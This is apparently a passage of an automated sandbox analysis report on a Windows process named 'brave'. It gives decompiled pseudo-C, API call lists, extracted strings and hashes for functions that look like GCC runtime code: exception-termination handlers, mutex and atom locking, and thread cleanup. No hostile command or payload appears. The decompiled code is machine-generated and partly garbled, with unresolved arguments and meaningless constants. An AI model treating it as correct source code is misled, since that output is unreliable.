				_t100 =  *((intOrPtr*)(_t158 + 0x2c));
				if (_t100 != 0) goto 0x52b4349c;
				free(__r15);
				E00007FF67FF652B52110(2, 1, 0x2e636367, _t114, _t113, 0x2e636367,  *0x2E756E672E63636F + 0x2e636367, 0x2e636367);
				 *_t114();
				fputs(_t153);
				goto 0x52b4346b;
				 *0x52dd2c70();
				r8d = 0x2d;
				fwrite(??, ??, ??, ??);
				abort();
				 *0x52dd2c70();
				r8d = 0x1d;
				fwrite(??, ??, ??, ??);
				abort();
				if (_t100 != 0) goto 0x52b4356f;
				0x52b51a10();
				_t107 =  *0x2e636367;
				 *((intOrPtr*)(_t107 + 0x10))();
				 *_t114();
				_t170 = _t107;
				r8d = 0xb;
				fwrite(??, ??, ??, ??);
				 *_t114();
				fputs(??, ??);
				 *_t114();
				fputc(??, ??);
				E00007FF67FF652B51C20(_t107);
				goto 0x52b434d5;
				0x52b51a10();
				E00007FF67FF652B51C20(_t107);
				_t178 = _t107;
				E00007FF67FF652B51C20(_t107);
				_t134 = _t107;
				E00007FF67FF652B2FEC0();
				E00007FF67FF652B519A0(_t93, _t94, _t107, _t134);
				 *_t107 = 0x52dd7100;
				_t75 = E00007FF67FF652B52160(8, 1, 0x52dd7100, _t114, _t107, 0x52dd6af0, 0x7ff652b431e0, _t170, _t178, 0x2e636367);
				_t136 =  *0x52dd2d30; // 0x1ac13ee0080
				if (_t136 == 0) goto 0x52b435e0;
				free(??);
				 *0x52dd2d30 = 0;
				return _t75;
			}

0x7ff652b43230
0x7ff652b4323a
0x7ff652b43241
0x7ff652b43292
0x7ff652b432aa
0x7ff652b432ad
0x7ff652b432bb
0x7ff652b432bf
0x7ff652b432cd
0x7ff652b432df
0x7ff652b432ed
0x7ff652b432f1
0x7ff652b432f4
0x7ff652b432f8
0x7ff652b432fc
0x7ff652b43300
0x7ff652b43304
0x7ff652b43308
0x7ff652b4330c
0x7ff652b43310
0x7ff652b43314
0x7ff652b43323
0x7ff652b43333
0x7ff652b43347
0x7ff652b43356
0x7ff652b43365
0x7ff652b43374
0x7ff652b43379
0x7ff652b4337c
0x7ff652b4338c
0x7ff652b43391
0x7ff652b43396
0x7ff652b4339b
0x7ff652b433a0
0x7ff652b433a5
0x7ff652b433aa
0x7ff652b433af
0x7ff652b433b7
0x7ff652b433bf
0x7ff652b433ca
0x7ff652b433ce
0x7ff652b433d5
0x7ff652b433e0
0x7ff652b433e6
0x7ff652b433ed
0x7ff652b433f5
0x7ff652b4340b
0x7ff652b43416
0x7ff652b43421
0x7ff652b4342b
0x7ff652b43435
0x7ff652b43443
0x7ff652b4344c
0x7ff652b4345c
0x7ff652b4345e
0x7ff652b43466
0x7ff652b43470
0x7ff652b43472
0x7ff652b43487
0x7ff652b43490
0x7ff652b43492
0x7ff652b43497
0x7ff652b4349c
0x7ff652b434a1
0x7ff652b434a9
0x7ff652b434ae
0x7ff652b434b5
0x7ff652b434bb
0x7ff652b434d0
0x7ff652b434d5
0x7ff652b434df
0x7ff652b434e5
0x7ff652b434fa
0x7ff652b434ff
0x7ff652b4350b
0x7ff652b4350d
0x7ff652b43515
0x7ff652b43518
0x7ff652b43523
0x7ff652b43525
0x7ff652b43528
0x7ff652b4353a
0x7ff652b43544
0x7ff652b4354c
0x7ff652b43556
0x7ff652b43560
0x7ff652b43565
0x7ff652b4356a
0x7ff652b4356f
0x7ff652b43574
0x7ff652b4357e
0x7ff652b43581
0x7ff652b43586
0x7ff652b43589
0x7ff652b43599
0x7ff652b435b6
0x7ff652b435b9
0x7ff652b435c4
0x7ff652b435ce
0x7ff652b435d0
0x7ff652b435d5
0x7ff652b435e4

APIs

memcpy.MSVCRT ref: 00007FF652B433AF
fwrite.MSVCRT ref: 00007FF652B434D0

Part of subcall function 00007FF652B2E1F0: strlen.MSVCRT ref: 00007FF652B2E27E
Part of subcall function 00007FF652B2E1F0: memcpy.MSVCRT ref: 00007FF652B2E292
Part of subcall function 00007FF652B2E1F0: free.MSVCRT ref: 00007FF652B2E29D

fwrite.MSVCRT ref: 00007FF652B4344C
fputs.MSVCRT ref: 00007FF652B43466
fwrite.MSVCRT ref: 00007FF652B43487
free.MSVCRT ref: 00007FF652B43497
fputs.MSVCRT ref: 00007FF652B434A9
abort.MSVCRT ref: 00007FF652B434D5
fwrite.MSVCRT ref: 00007FF652B434FA
abort.MSVCRT ref: 00007FF652B434FF
fwrite.MSVCRT ref: 00007FF652B4353A
fputs.MSVCRT ref: 00007FF652B4354C
fputc.MSVCRT ref: 00007FF652B43560

Strings

https://, xrefs: 00007FF652B4333D
l bug re, xrefs: 00007FF652B43249
l bug re, xrefs: 00007FF652B43319
bmit ful, xrefs: 00007FF652B43296
what(): , xrefs: 00007FF652B43533
/): , xrefs: 00007FF652B432E3
nsion (P, xrefs: 00007FF652B4327B
lease su, xrefs: 00007FF652B43285
port at , xrefs: 00007FF652B4334C
not enou, xrefs: 00007FF652B43253
terminate called without an active exception, xrefs: 00007FF652B434C6
for for, xrefs: 00007FF652B43267
org/bugs, xrefs: 00007FF652B432D5
gcc.gnu., xrefs: 00007FF652B4336A
terminate called after throwing an instance of ', xrefs: 00007FF652B4343C
bmit ful, xrefs: 00007FF652B43329
gcc.gnu., xrefs: 00007FF652B432C3
gh space, xrefs: 00007FF652B4325D
org/bugs, xrefs: 00007FF652B4335B
https://, xrefs: 00007FF652B432A0
terminate called recursively, xrefs: 00007FF652B434F0
mat expa, xrefs: 00007FF652B43271
port at , xrefs: 00007FF652B432B1

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: fwrite$fputs$abortfreememcpy$fputcstrlen
String ID: what(): $ for for$/): $bmit ful$bmit ful$gcc.gnu.$gcc.gnu.$gh space$https://$https://$l bug re$l bug re$lease su$mat expa$not enou$nsion (P$org/bugs$org/bugs$port at $port at $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 1586115568-1351603976
Opcode ID: fe6879b4978ab91ad2477e5e00425517d39e91c0031cd86db954f8b7f250dbe4
Instruction ID: 19777cc33c0136414929374dd216028e9e74d0a8b1fe6d7964c4e557cbcbc1b2
Opcode Fuzzy Hash: fe6879b4978ab91ad2477e5e00425517d39e91c0031cd86db954f8b7f250dbe4
Instruction Fuzzy Hash: 7F71C521B1874145FB10DBA2AC853A972A6FB46B8CF5C4239ED9DABB96DE7CD000C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2F840 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 157synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF652B2F848
CreateMutexA.KERNEL32 ref: 00007FF652B2F957
WaitForSingleObject.KERNEL32 ref: 00007FF652B2F968
FindAtomA.KERNEL32 ref: 00007FF652B2F97D
AddAtomA.KERNEL32 ref: 00007FF652B2F9BD
_onexit.MSVCRT ref: 00007FF652B2F9DA
ReleaseMutex.KERNEL32 ref: 00007FF652B2F9E2
CloseHandle.KERNEL32 ref: 00007FF652B2F9EB

Strings

failed to to lock creation mutex, xrefs: 00007FF652B2FAB6
failed to get string from atom, xrefs: 00007FF652B2FAD6
failed to add string to atom table, xrefs: 00007FF652B2FAA3
aaaaaaaa, xrefs: 00007FF652B2F8FE
__eh_shmem3_gcc_tdm_, xrefs: 00007FF652B2F897, 00007FF652B2F8C7
aaaaaaaa, xrefs: 00007FF652B2F8F4

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: __eh_shmem3_gcc_tdm_$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-4003979217
Opcode ID: eeefa348b6469097a2ce0c1b6ef4fcb7977b54c7f9b7813c6b328c0e60a68bab
Instruction ID: f56382de914010d0b9fca063816412e2a69df4de95e6ef49b8319504cd9ff7ef
Opcode Fuzzy Hash: eeefa348b6469097a2ce0c1b6ef4fcb7977b54c7f9b7813c6b328c0e60a68bab
Instruction Fuzzy Hash: 6F6171B5F18B4391EB018B14AC052B876A1BF5678DF4C8335C94DEA6A0EEFCE945C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2FC40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF652B2FD13
abort.MSVCRT(?,?,?,?,?,?,00000000,00000001,?,?,00000060,?,00007FF652B521C5), ref: 00007FF652B2FD19
RtlUnwindEx.KERNEL32 ref: 00007FF652B2FE2C

Strings

CCG!, xrefs: 00007FF652B2FD01
CCG!, xrefs: 00007FF652B2FC69
CCG , xrefs: 00007FF652B2FCAD
CCG", xrefs: 00007FF652B2FCA1

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: 5a5515d5399e8932a17ee12ba86523fad0d7272596fb782806b5c41e63c3ad30
Instruction ID: de0c1928ab46721ded509d168ae9b72c0ad55b583d1f94371619fbb7ad3f16b8
Opcode Fuzzy Hash: 5a5515d5399e8932a17ee12ba86523fad0d7272596fb782806b5c41e63c3ad30
Instruction Fuzzy Hash: 13517C72608B8186D7608F55FC806AD73A4F78AB9CF684126EE8D93B58CF79D891C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B32220 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 51
threadCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF67FF652B32220(void* __edi, void* __esp, void* __rbx, void* __rdi, void* __rsi, void* __rbp, void* __r12, void* __r13, void* __r14, void* __r15) {
				char _v14;
				short _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				char _v81;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				char _v120;
				void* _t206;
				signed int _t214;
				intOrPtr _t220;
				void* _t281;
				intOrPtr _t340;
				intOrPtr _t341;
				intOrPtr _t342;
				intOrPtr _t343;
				intOrPtr _t344;
				intOrPtr _t347;
				intOrPtr _t348;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t353;
				intOrPtr _t354;
				intOrPtr _t355;
				intOrPtr _t357;
				intOrPtr _t358;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr _t363;
				intOrPtr _t366;
				intOrPtr _t367;
				intOrPtr _t369;
				intOrPtr _t372;
				intOrPtr _t375;
				intOrPtr _t377;
				intOrPtr _t378;
				intOrPtr _t380;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t386;
				intOrPtr _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				intOrPtr _t394;
				intOrPtr _t395;
				intOrPtr _t401;
				intOrPtr _t402;
				intOrPtr* _t405;
				void* _t406;
				void* _t412;
				intOrPtr* _t413;
				signed long long _t415;
				void* _t436;
				signed long long _t482;
				void* _t492;
				long long _t494;
				intOrPtr* _t496;
				intOrPtr* _t497;
				void* _t498;
				void* _t499;
				void* _t517;
				void* _t518;
				void* _t526;
				void* _t536;

				_t499 = _t498 - 0x98;
				_v120 = 0x6f727245;
				_v112 = 0x696e6165;
				_v104 = 0x70732070;
				_v96 = 0x20737965;
				_v88 = 0x65726874;
				_v80 = 0x20737965;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0;
				_v48 = 0;
				_v40 = 0;
				_v32 = 0;
				_v24 = 0;
				_v16 = 0;
				_v14 = 0;
				GetCurrentThreadId();
				r8d = 0xa;
				__imp___ultoa();
				if (_v81 == 0) goto 0x52b32332;
				goto 0x52b3230a;
				if (0x65726874 == 0x6b) goto 0x52b32327;
				if ( *((char*)( &_v120 + 0x65726874)) != 0) goto 0x52b32300;
				if (0 == 0x6a) goto 0x52b32327;
				 *((char*)(_t499 + 0x48)) = 0xa;
				 *((char*)(_t499 + 0x20646165726895)) = 0;
				OutputDebugStringA(??);
				abort();
				goto 0x52b3231b;
				asm("o16 nop [cs:eax+eax]");
				_t405 =  &_v120;
				E00007FF67FF652B30F00( &_v120);
				E00007FF67FF652B304E0(0x2064616572687d);
				_t220 =  *_t405;
				if (_t220 != 0) goto 0x52b323a0;
				E00007FF67FF652B32160();
				 *_t405 = 1;
				E00007FF67FF652B30800(0x2064616572687d);
				_pop(_t406);
				_pop(_t492);
				_pop(_t517);
				_pop(_t526);
				goto E00007FF67FF652B31110;
				if (_t220 == 1) goto 0x52b32382;
				 *0x52dd2c70();
				r9d = _t220;
				0x52b416f8();
				goto 0x52b32382;
				asm("o16 nop [eax+eax]");
				_t496 =  *0x52dd6920; // 0x7ff652de1400
				_t340 =  *_t496;
				if (_t340 == 0) goto 0x52b32518;
				if ( *((long long*)(_t340 + 0x60)) != 0) goto 0x52b32540;
				 *((long long*)(_t340 + 0x60)) = 0x52dd2bc8;
				E00007FF67FF652B304E0(0x52dd2bc8);
				if ( *((intOrPtr*)(0x20646165726a4d)) != 0) goto 0x52b325f0;
				if ( *0x206461657268C5 == 0) goto 0x52b32430;
				free(_t406);
				if ( *0x206461657268CD == 0) goto 0x52b3243e;
				free(_t492);
				if ( *0x206461657268D5 == 0) goto 0x52b3244c;
				free(__rdi);
				 *((long long*)(0x20646165726875)) = 0;
				 *((long long*)(0x20646165726a4d)) = 0;
				memset(__edi, 0, 2 << 0);
				_t341 =  *_t496;
				if (_t341 == 0) goto 0x52b32758;
				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0x52b32550;
				 *((long long*)(_t341 + 0x58)) = 0x52de13b0;
				if ( *0x52de13b0 == 0) goto 0x52b3255e;
				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0x52b325c0;
				 *((long long*)(_t341 + 0x58)) = 0x52de13b0;
				 *((long long*)( *0x52de13b0 + 0x1d0)) = 0x20646165726875;
				if ( *((long long*)(_t341 + 0x58)) == 0) goto 0x52b325e0;
				 *((long long*)( *((intOrPtr*)(_t341 + 0x58)))) = 0x20646165726875;
				if (_t341 == 0) goto 0x52b325a3;
				_t214 = 0 |  *((long long*)(_t341 + 0x60)) != 0x00000000;
				if (_t214 == 0) goto 0x52b325c9;
				if (_t341 == 0) goto 0x52b32a30;
				_pop(_t494);
				_t497 = _t517;
				_t518 = _t526;
				_pop(_t536);
				goto E00007FF67FF652B30800;
				E00007FF67FF652B37060();
				_t342 =  *_t497;
				if ( *((long long*)(_t341 + 0x60)) == 0) goto 0x52b32402;
				if (_t342 != 0) goto 0x52b32540;
				E00007FF67FF652B37060();
				asm("o16 nop [cs:eax+eax]");
				goto 0x52b3240d;
				if ( *((long long*)( *((intOrPtr*)(_t342 + 0x58)))) != 0) goto 0x52b324a7;
				if ( *((long long*)(_t342 + 0x58)) != 0) goto 0x52b326d8;
				 *((long long*)(_t342 + 0x58)) = 0x52de13b0;
				 *0x52de13b0 = _t494;
				if ((_t214 & 0xffffff00 |  *((long long*)(_t342 + 0x50)) != 0x00000000) == 0) goto 0x52b3280d;
				if (_t342 == 0) goto 0x52b32c8c;
				 *((long long*)( *((intOrPtr*)(_t342 + 0x50)))) =  *0x52de13b0;
				if (_t342 != 0) goto 0x52b324e2;
				E00007FF67FF652B37060();
				_t343 =  *_t497;
				goto 0x52b324ea;
				goto 0x52b324bd;
				 *((long long*)(_t343 + 0x60)) = 0x52dd2bc8;
				goto 0x52b324ff;
				 *((long long*)(_t343 + 0x58)) = 0x52de13b0;
				goto 0x52b324d6;
				_t344 =  *_t497;
				if (_t344 == 0) goto 0x52b32a40;
				if ( *((long long*)(_t344 + 0x70)) != 0) goto 0x52b326c8;
				 *((long long*)(_t344 + 0x70)) = 0x52de13a0;
				if ( *0x52de13a0 == 0) goto 0x52b32422;
				if ( *((long long*)( *_t497 + 0x70)) == 0) goto 0x52b32820;
				r12d = 0;
				goto 0x52b3266a;
				asm("o16 nop [cs:eax+eax]");
				if (0x52de13b0 == _t518) goto 0x52b32422;
				if (0x7ff652de13af - _t518 < 0) goto 0x52b32422;
				_t347 =  *_t497;
				if (_t347 == 0) goto 0x52b32708;
				if ( *((long long*)(_t347 + 0x68)) == 0) goto 0x52b326e8;
				_t348 =  *_t497;
				_t482 = _t518 + 0x7ff652de13af >> 1 << 4;
				if (_t536 ==  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t347 + 0x68)))) + _t482 + 8))) goto 0x52b32830;
				if (_t348 == 0) goto 0x52b32730;
				if ( *((long long*)(_t348 + 0x68)) == 0) goto 0x52b326f8;
				_t350 =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x68))));
				if (_t536 -  *((intOrPtr*)(_t350 + _t482 + 8)) < 0) goto 0x52b32650;
				goto 0x52b3265d;
				asm("o16 nop [eax+eax]");
				_t351 =  *((intOrPtr*)(_t350 + 0x70));
				goto 0x52b32616;
				goto 0x52b32574;
				 *((long long*)(_t351 + 0x68)) = 0x52de13a8;
				goto 0x52b32689;
				 *((long long*)(_t351 + 0x68)) = 0x52de13a8;
				goto 0x52b326b2;
				E00007FF67FF652B37060();
				_t353 =  *_t497;
				if ( *0x7FF652DE1410 == 0) goto 0x52b326e8;
				if (_t353 != 0) goto 0x52b32681;
				E00007FF67FF652B37060();
				goto 0x52b32681;
				E00007FF67FF652B37060();
				_t354 =  *_t497;
				if ( *((long long*)(_t353 + 0x68)) == 0) goto 0x52b326f8;
				if (_t354 != 0) goto 0x52b326ae;
				E00007FF67FF652B37060();
				goto 0x52b326ae;
				E00007FF67FF652B37060();
				_t355 =  *_t497;
				if ( *((long long*)(_t354 + 0x58)) == 0) goto 0x52b32492;
				if (_t355 != 0) goto 0x52b32550;
				E00007FF67FF652B37060();
				if ( *((long long*)( *((intOrPtr*)(_t355 + 0x58)))) == 0) goto 0x52b32aac;
				_t357 =  *_t497;
				if (_t357 != 0) goto 0x52b324a7;
				E00007FF67FF652B37060();
				_t358 =  *_t497;
				if ( *((long long*)(_t357 + 0x58)) == 0) goto 0x52b324b2;
				if (_t358 != 0) goto 0x52b325c0;
				E00007FF67FF652B37060();
				_t359 =  *_t497;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t358 + 0x58)))) + 0x1d0)) = _t494;
				if (_t359 != 0) goto 0x52b324c7;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t359 + 0x58)) == 0) goto 0x52b325e0;
				if ( *_t497 != 0) goto 0x52b324d2;
				E00007FF67FF652B37060();
				_t361 =  *_t497;
				goto 0x52b324d6;
				 *((long long*)(_t361 + 0x50)) = 0x52de13b8;
				goto 0x52b32594;
				 *((long long*)(_t361 + 0x70)) = 0x52de13a0;
				goto 0x52b32633;
				if (_t361 == 0) goto 0x52b32c9e;
				if ( *((long long*)(_t361 + 0x68)) != 0) goto 0x52b32908;
				 *((long long*)(_t361 + 0x68)) = 0x52de13a8;
				_t412 =  *((intOrPtr*)(_t351 + 0x58)) + 1;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x52b32b20;
				_t281 =  *0x52de13a0 - _t412; // 0x1
				 *((long long*)(_t361 + 0x70)) = 0x52de13a0;
				if (_t281 > 0) goto 0x52b32ba2;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x52b32a10;
				 *((long long*)(_t361 + 0x70)) = 0x52de13a0;
				 *0x52de13a0 =  *0x52de13a0 - 1;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x52b32b10;
				 *((long long*)(_t361 + 0x70)) = 0x52de13a0;
				if ( *0x52de13a0 != 0) goto 0x52b32422;
				if ( *((long long*)(_t361 + 0x68)) == 0) goto 0x52b32c5b;
				free(??);
				_t363 =  *_t497;
				if (_t363 == 0) goto 0x52b32cb7;
				if ( *((long long*)(_t363 + 0x78)) == 0) goto 0x52b32c4b;
				_t413 =  *((intOrPtr*)(_t363 + 0x78));
				 *_t413 = 0;
				if ( *((long long*)(_t363 + 0x70)) == 0) goto 0x52b32c38;
				 *((long long*)( *((intOrPtr*)(_t363 + 0x70)))) =  *_t413;
				goto 0x52b32422;
				if ( *_t497 != 0) goto 0x52b3284f;
				E00007FF67FF652B37060();
				_t366 =  *_t497;
				if (_t366 != 0) goto 0x52b32853;
				E00007FF67FF652B37060();
				_t367 =  *_t497;
				if ( *((long long*)(_t366 + 0x70)) == 0) goto 0x52b3285e;
				if (_t367 != 0) goto 0x52b32b20;
				E00007FF67FF652B37060();
				_t369 =  *_t497;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x70)))) - _t413 + 1 <= 0) goto 0x52b32b80;
				if (_t369 != 0) goto 0x52b32b2d;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t369 + 0x70)) == 0) goto 0x52b32b34;
				if ( *_t497 != 0) goto 0x52b32ba2;
				E00007FF67FF652B37060();
				_t372 =  *_t497;
				if (_t372 != 0) goto 0x52b32b49;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t372 + 0x68)) == 0) goto 0x52b32c28;
				if ( *_t497 != 0) goto 0x52b32b54;
				E00007FF67FF652B37060();
				_t375 =  *_t497;
				if (_t375 != 0) goto 0x52b32c6e;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t375 + 0x68)) == 0) goto 0x52b32c79;
				if ( *_t497 != 0) goto 0x52b32b65;
				E00007FF67FF652B37060();
				goto 0x52b32b65;
				_t377 =  *_t497;
				if (_t377 == 0) goto 0x52b32ba8;
				goto 0x52b3288c;
				asm("o16 nop [cs:eax+eax]");
				E00007FF67FF652B37060();
				goto 0x52b324fb;
				asm("o16 nop [eax+eax]");
				E00007FF67FF652B37060();
				_t378 =  *_t497;
				if ( *((long long*)(_t377 + 0x70)) == 0) goto 0x52b32608;
				if (_t378 != 0) goto 0x52b326c8;
				E00007FF67FF652B37060();
				if ( *((long long*)( *((intOrPtr*)(_t378 + 0x70)))) == 0) goto 0x52b32422;
				_t380 =  *_t497;
				if (_t380 != 0) goto 0x52b32624;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t380 + 0x70)) == 0) goto 0x52b32820;
				if ( *_t497 != 0) goto 0x52b3262f;
				E00007FF67FF652B37060();
				goto 0x52b32633;
				_t383 =  *_t497;
				if (_t383 != 0) goto 0x52b3255e;
				E00007FF67FF652B37060();
				_t384 =  *_t497;
				if ( *((long long*)(_t383 + 0x58)) == 0) goto 0x52b32569;
				if (_t384 != 0) goto 0x52b326d8;
				E00007FF67FF652B37060();
				_t415 =  *((intOrPtr*)(_t384 + 0x58));
				 *_t415 = _t494;
				if ( *_t497 != 0) goto 0x52b32577;
				E00007FF67FF652B37060();
				_t386 =  *_t497;
				goto 0x52b3257f;
				goto 0x52b328a6;
				if (_t415 -  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x70)))) >= 0) goto 0x52b32876;
				if ( *((long long*)(_t386 + 0x70)) != 0) goto 0x52b32ba2;
				 *((long long*)(_t386 + 0x70)) = 0x52de13a0;
				if ( *((long long*)(_t386 + 0x68)) == 0) goto 0x52b32c28;
				_t436 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x68)))) + (_t415 << 4) - 0x10;
				memcpy(??, ??, ??);
				_t389 =  *_t497;
				if (_t389 != 0) goto 0x52b32876;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t389 + 0x70)) != 0) goto 0x52b32a10;
				goto 0x52b32881;
				goto 0x52b32b3f;
				E00007FF67FF652B37060();
				_t391 =  *_t497;
				 *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) =  *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) - 1;
				if (_t391 != 0) goto 0x52b32890;
				E00007FF67FF652B37060();
				_t392 =  *_t497;
				if ( *((long long*)(_t391 + 0x70)) == 0) goto 0x52b3289b;
				if (_t392 != 0) goto 0x52b32b10;
				E00007FF67FF652B37060();
				if ( *((long long*)( *((intOrPtr*)(_t392 + 0x70)))) != 0) goto 0x52b32422;
				_t394 =  *_t497;
				if (_t394 != 0) goto 0x52b328b0;
				E00007FF67FF652B37060();
				_t395 =  *_t497;
				if ( *((long long*)(_t394 + 0x68)) == 0) goto 0x52b32c5b;
				if (_t395 != 0) goto 0x52b328bb;
				E00007FF67FF652B37060();
				goto 0x52b328bb;
				 *((long long*)(_t395 + 0x68)) = 0x52de13a8;
				goto 0x52b32b58;
				 *((long long*)(_t395 + 0x70)) = 0x52de13a0;
				goto 0x52b328f9;
				 *0x7FF652DE1418 = 0x52de1398;
				goto 0x52b328e3;
				 *0x7FF652DE1408 = 0x52de13a8;
				goto 0x52b328bf;
				if ( *((long long*)(0x7ff652de1410)) != 0) goto 0x52b32b65;
				 *((long long*)(0x7ff652de1410)) = 0x52de13a8;
				goto 0x52b32b69;
				E00007FF67FF652B37060();
				goto 0x52b32594;
				E00007FF67FF652B37060();
				if ( *((long long*)( *_t497 + 0x68)) != 0) goto 0x52b32908;
				goto 0x52b32844;
				E00007FF67FF652B37060();
				_t401 =  *_t497;
				if ( *((long long*)( *_t497 + 0x78)) == 0) goto 0x52b32c4b;
				if (_t401 != 0) goto 0x52b328df;
				E00007FF67FF652B37060();
				_t402 =  *_t497;
				 *((long long*)( *((intOrPtr*)(_t401 + 0x78)))) = 0;
				if (_t402 != 0) goto 0x52b328ea;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t402 + 0x70)) == 0) goto 0x52b32c38;
				if ( *_t497 != 0) goto 0x52b328f5;
				_t206 = E00007FF67FF652B37060();
				goto 0x52b328f5;
				asm("o16 nop [eax+eax]");
				if (_t436 == 0) goto 0x52b32d2f;
				if ( *((long long*)(_t436 + 0x1d0)) == 0) goto 0x52b32d30;
				return _t206;
			}

0x7ff652b32220
0x7ff652b3223b
0x7ff652b3224a
0x7ff652b32259
0x7ff652b32268
0x7ff652b3226f
0x7ff652b32276
0x7ff652b3227b
0x7ff652b32284
0x7ff652b3228d
0x7ff652b32296
0x7ff652b3229f
0x7ff652b322a8
0x7ff652b322b1
0x7ff652b322bd
0x7ff652b322c5
0x7ff652b322cd
0x7ff652b322d8
0x7ff652b322e0
